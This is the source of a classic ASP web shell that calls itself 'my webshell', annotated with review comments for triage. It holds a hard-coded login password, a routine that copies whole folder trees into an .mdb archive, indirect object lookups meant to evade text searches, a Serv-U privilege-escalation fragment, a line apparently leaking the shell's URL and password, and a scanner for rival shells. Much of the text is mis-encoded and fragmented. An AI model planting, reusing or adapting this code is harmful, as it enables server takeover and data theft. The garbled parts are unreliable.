<%
' Page-wide setup for this classic ASP (VBScript) script.
' Server.ScriptTimeout is in seconds; this value effectively removes the per-request time limit,
' so long-running requests to this page will not be cut off by the ASP engine.
Server.ScriptTimeout=10000000
Response.Buffer =true
' From here on runtime errors are suppressed; execution continues at the next statement
' and failures are only visible where the code inspects Err itself.
On Error Resume Next
' Hard-coded access password. Further down the page it is compared with the "pass" form field
' and, on a match, stored in the session under the key "vipha2dmin".
' Review note: a static credential embedded in a server-side script, together with that session
' key name, is a stable string to search for when triaging a web root.
UserPass="admin888"
' Display name the author assigned to the tool.
mName="my webshell"
' The next two statements repeat the ones above; no additional effect is visible here.
Response.Buffer =true
On Error Resume Next
' ShowErr: if an error is pending in Err, write its description to the response,
' then clear the error and flush the output buffer. Does nothing when Err is not set.
sub ShowErr()
If Err Then
' The description is written through RRS, i.e. without HTML encoding.
RRS" " & Err.Description & " "
Err.Clear:Response.Flush
End If
end sub
' RRS: thin wrapper around Response.Write.
' str is emitted exactly as passed (no HTML encoding is applied here), so whatever a caller
' concatenates into str reaches the page unchanged.
Sub RRS(str)
response.write(str)
End Sub
' RePath: returns S with every single backslash doubled ("\" -> "\\").
' Presumably used to embed Windows paths inside script string literals - the callers are not
' visible in this part of the file, so confirm before relying on that.
Function RePath(S)
RePath=Replace(S,"\","\\")
End Function
' RRePath: inverse of RePath - returns S with every doubled backslash collapsed ("\\" -> "\").
Function RRePath(S)
RRePath=Replace(S,"\\","\")
End Function
' Request context captured once per request and used by the rest of the page.
' URL: path of this script as requested; ServerIP: local address the request arrived on.
URL=Request.ServerVariables("URL")
ServerIP=Request.ServerVariables("LOCAL_ADDR")
' Action selects which feature of the page runs. Request("...") reads the name from the query
' string, form body, cookies and server variables, so it can arrive by GET or POST.
Action=Request("Action")
' Physical directory of this script and physical root of the web site.
RootPath=Server.MapPath(".")
WWWRoot=Server.MapPath("/")
' serveru is "<Host header><script path>"; serverp is a copy of the hard-coded password.
' NOTE(review): the truncated RRS call that follows this section concatenates serveru and
' "&p=" & serverp into response output. The surrounding markup is missing from this copy, so
' the destination of that string cannot be determined from here - treat it as the page
' disclosing its own location and password, and verify against an intact sample.
serveru=request.servervariables("http_host")&url
serverp=userpass
' Caller-supplied folder and file names; nothing in this section validates them.
' Review note: the parameter names Action, FolderPath and FName are the fields to look for
' in web server logs when checking whether this page was used.
FolderPath=Request("FolderPath")
FName=Request("FName")
BackUrl="
"
RRS Efun&""&serveru&"&p="&serverp&"'>"
End Sub
' PageAddToMdb: request handler for the "pack a folder into an .mdb / unpack it again" feature.
' Reads two request parameters:
'   theAct  - "addToMdb" to pack, "releaseFromMdb" to unpack; anything else renders the form.
'   thePath - folder path, passed to the worker routine exactly as received (no validation here).
' alertThenClose, echo and unPack are defined outside this part of the file.
Sub PageAddToMdb()
Dim theAct,thePath
theAct=Request("theAct")
thePath=Request("thePath")
' Timeout in seconds for this request; overrides the page-wide value.
Server.ScriptTimeOut=5000
If theAct="addToMdb" Then
' Pack the tree under thePath into the database, report, and stop processing the page.
addToMdb(thePath)
alertThenClose("Y!")
echo ""
Response.End
End If
If theAct="releaseFromMdb" Then
' Unpack a previously created database, report, and stop processing the page.
unPack(thePath)
alertThenClose("Y!")
Response.End
End If
' No recognised action: emit the form. The HTML markup and the original (non-ASCII) label text
' were lost or mis-encoded in this copy, so only fragments of the strings remain.
echo "而ㅼ찈竊?br/>"
echo ""
echo "?⑷?(FSO): "
echo ""
End Sub
' addToMdb: copies every file under thePath into a newly created Jet database.
'   thePath - root folder to archive (comes straight from the request in PageAddToMdb).
' The database is created as "HYTop.mdb" in the directory of this script, with one table
' FileData(Id, thePath, fileContent) holding one row per file.
' Review note: HYTop.mdb (and the HYTop.ldb lock file named in sysFileList of the tree walkers)
' appearing in a web directory, and a web worker instantiating ADOX.Catalog / Jet OLEDB, are
' the observable artefacts of this routine.
Sub addToMdb(thePath)
' Errors are suppressed unless isDebugMode is set (isDebugMode is defined outside this section).
If isDebugMode=False Then
On Error Resume Next
End If
Dim rs,conn,stream,connStr,adoCatalog
Set rs=Server.CreateObject("ADODB.RecordSet")
Set stream=Server.CreateObject("ADODB.Stream")
Set conn=Server.CreateObject("ADODB.Connection")
Set adoCatalog=Server.CreateObject("ADOX.Catalog")
connStr="Provider=Microsoft.Jet.OLEDB.4.0; Data Source="&Server.MapPath("HYTop.mdb")
' Create the .mdb file, then connect to it. With errors suppressed, a failure of either step
' is not reported and the statements below still run.
adoCatalog.Create connStr
conn.Open connStr
conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED,thePath VarChar,fileContent Image)")
stream.Open
' Type=1 is adTypeBinary: file contents are read as raw bytes.
stream.Type=1
' Open the table itself as an updatable recordset (3,3 = adOpenStatic, adLockOptimistic).
rs.Open "FileData",conn,3,3
' The request parameter theMethod selects the directory walker: "fso" uses fsoX,
' anything else uses saX (both objects are created at page level).
If Request("theMethod")="fso" Then
fsoTreeForMdb thePath,rs,stream
Else
saTreeForMdb thePath,rs,stream
End If
' Release everything in the reverse order of use.
rs.Close
Conn.Close
stream.Close
Set rs=Nothing
Set conn=Nothing
Set stream=Nothing
Set adoCatalog=Nothing
End Sub
' Page-level COM objects shared by the two tree walkers below.
' The ProgIDs are not written literally: they are looked up in ObT, a table defined outside this
' part of the file. NOTE(review): judging by the methods called on them (GetFolder on fsoX,
' NameSpace on saX) these are presumably Scripting.FileSystemObject and Shell.Application -
' confirm against the ObT definition. Indirect ProgID lookup also means a plain-text search for
' those class names will not match these two lines.
dim fsoX,saX
Set saX=Server.CreateObject(ObT(14,0))
set fsoX=Server.CreateObject(ObT(0,0))
' fsoTreeForMdb: recursively walks thePath through fsoX and stores every file in the recordset.
'   thePath - folder to walk.
'   rs      - open, updatable recordset on the FileData table.
'   stream  - open binary ADODB.Stream, reused for every file.
' Declared as a Function but never assigns a return value.
Function fsoTreeForMdb(thePath,rs,stream)
Dim item,theFolder,folders,files,sysFileList
' Names that are skipped so the archive does not try to include its own database and lock file.
sysFileList="$HYTop.mdb$HYTop.ldb$"
' Disabled existence check; the message text is mis-encoded in this copy.
' If fsoX.FolderExists(thePath)=False Then
' showErr(thePath&"?λ쵖")
' End If
Set theFolder=fsoX.GetFolder(thePath)
Set files=theFolder.Files
Set folders=theFolder.SubFolders
' Depth-first: descend into every subfolder before handling this folder's own files.
For Each item In folders
fsoTreeForMdb item.Path,rs,stream
Next
For Each item In files
If InStr(sysFileList,"$"&item.Name&"$") <=0 Then
rs.AddNew
' Mid(...,4) drops the first three characters of the full path - presumably the "X:\" drive
' prefix, so the stored path is drive-relative; confirm against the unpack routine.
rs("thePath")=Mid(item.Path,4)
' The whole file is loaded into memory and written into the fileContent column.
stream.LoadFromFile(item.Path)
rs("fileContent")=stream.Read()
rs.Update
End If
Next
Set files=Nothing
Set folders=Nothing
Set theFolder=Nothing
End Function
' saTreeForMdb: same job as fsoTreeForMdb, but enumerates the tree through saX.NameSpace
' instead of fsoX, so it still works where the other object cannot be used.
'   thePath - folder to walk.
'   rs      - open, updatable recordset on the FileData table.
'   stream  - open binary ADODB.Stream, reused for every file.
Sub saTreeForMdb(thePath,rs,stream)
Dim item,theFolder,sysFileList
' Names that are skipped so the archive does not try to include its own database and lock file.
sysFileList="$HYTop.mdb$HYTop.ldb$"
Set theFolder=saX.NameSpace(thePath)
For Each item In theFolder.Items
If item.IsFolder=True Then
' Recurse into subfolders as they are encountered.
saTreeForMdb item.Path,rs,stream
Else
If InStr(sysFileList,"$"&item.Name&"$") <=0 Then
rs.AddNew
' Drops the first three characters of the full path - presumably the "X:\" drive prefix; confirm.
rs("thePath")=Mid(item.Path,4)
' The whole file is loaded into memory and written into the fileContent column.
stream.LoadFromFile(item.Path)
rs("fileContent")=stream.Read()
rs.Update
End If
End If
Next
Set theFolder=Nothing
End Sub
if session("vipha2dmin")<>UserPass then
if request.form("pass")<>"" then
if request.form("pass")=UserPass then
session("vipha2dmin")=UserPass
response.redirect url
else
rrs"
"
RRS""
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
RRS"
?딇솃堊쏄톬,甸썹뜷甸됱즲痢깆쫰竊?br>"&cmd&"
"
RRS""
RRS"
"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
RRS"
"
RRS"
"
RRS"
"
RRS"
Serv-U ?딈걶?덃럹 viph曆싩뿰寃?/td>"
RRS"
"
RRS"
"
RRS"
?곕뭇痢?
"
RRS"
"
RRS"
"
RRS"
"
RRS"
??利덌폏
"
RRS"
"
RRS"
"
RRS"
"
RRS"
????폏
"
RRS"
"
RRS"
"
RRS"
"
RRS"
繹앭쎓夷뚯벟竊?/td>"
RRS"
"
RRS"
"
RRS"
"
RRS"
痢긱利덌폏
"
RRS"
"
RRS"
"
RRS"
"
RRS"
"
RRS""
RRS"
"
RRS"
"
end select
' Gpath: returns the drive of the Windows directory as a lower-case two-character string
' (for example "c:"). Falls back to the literal "c:" when Scripting.FileSystemObject cannot
' be created.
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
' Object creation failed (component unavailable or blocked): use the default drive.
if err.number>0 then
gpath="c:"
exit function
end if
' GetSpecialFolder(0) is the Windows folder; keep only its first two characters.
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
'?而곸?
Case "kmuma"
dim Report
if request.QueryString("act")<>"scan" then
RRS ("縕®콇紐쎌빱姨?/b>- "&Server.MapPath("/")&" ")
RRS ("援띕꼱?쇱빱姨?/b>- "&Server.MapPath("."))
RRS "
"
else
if request.Form("path")="" then
RRS("夷뚯벟瑗뉗퐯礪⑥솗")
response.End()
end if
if request.Form("path")="\" then
TmpPath = Server.MapPath("\")
elseif request.Form("path")="." then
TmpPath = Server.MapPath(".")
else
TmpPath = request.Form("path")
end if
timer1 = timer
Sun = 0
SumFiles = 0
SumFolders = 1
If request.Form("radiobutton") = "sws" Then
DimFileExt = "asp,cer,asa,cdx"
Call ShowAllFile(TmpPath)
Else
If request.Form("path") = "" or request.Form("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
RRS("?꾧뺀岳귥댂瑗뉏풘??br> ?앸읉?쇠러?ㅶ릿??/a>")
response.End()
End If
DimFileExt = request.Form("Search_fileExt")
Call ShowAllFile2(TmpPath)
End If
RRS "
"
If request.Form("radiobutton") = "sws" Then
RRS "
?≪댂若?슕夷뚯벟
"
RRS "
??앹?
"
RRS "
痍꾤뵖
"
RRS "
?쇱돁/??㎗?귥뇤
"
else
RRS "
?≪댂若?슕夷뚯벟
"
RRS "
?≪댂?쇱돁?귥뇤
"
RRS "
??㎗?귥뇤
"
end if
RRS "
"
RRS Report
RRS "
"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
RRS " 援뜹Ⅳ?듸쨯臾양뿰二?&thetime&"遊먯랬"
end if
' ShowAllFile: recursively walks Path and hands every file with a matching extension to ScanFile.
'   Path - folder to scan; the sub returns silently when it does not exist.
' CheckExt is defined outside this part of the file; it decides which extensions are scanned.
' SumFiles and SumFolders are not declared here - they are counters maintained by the caller's
' scope and incremented once per scanned file and per visited subfolder.
Sub ShowAllFile(Path)
Set F1SO = CreateObject("Scripting.FileSystemObject")
if not F1SO.FolderExists(path) then exit sub
Set f = F1SO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then
' NOTE(review): Temp is not assigned in this sub. If it is empty the path is simply
' Path & "\" & name; if some other routine has left a value in it the path will be wrong.
' Confirm where Temp is set.
Call ScanFile(Path&Temp&"\"&myfile.name, "")
SumFiles = SumFiles + 1
End If
Next
' Files first, then descend into each subfolder.
Set fc = f.SubFolders
For Each f1 in fc
ShowAllFile path&"\"&f1.name
SumFolders = SumFolders + 1
Next
Set F1SO = Nothing
End Sub
Sub ScanFile(FilePath, InFile)
Server.ScriptTimeout=999999999
If InFile <> "" Then
Infiles = "留▼뙜??뎨"& InFile & "?≪댂愿踰든뜷甸?/font>"
End If
Set FSO1s = CreateObject("Scripting.FileSystemObject")
on error resume next
set ofile = FSO1s.OpenTextFile(FilePath)
filetxt = Lcase(ofile.readall())
If err Then Exit Sub end if
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
temp = ""&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&" "
temp=temp&"湲띿꽌 "
temp=temp&"?앸뇸 "
temp=temp&"由욥숯 "
temp=temp&"甸노븸"
If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
Report = Report&"
"
Sun = Sun + 1
temp="-=| 瘟운?|=-"
End if
If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
Report = Report&"
"
Sun = Sun + 1
temp="-=| 瘟운?|=-"
End If
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b"
If regEx.Test(filetxt) Then
Report = Report&"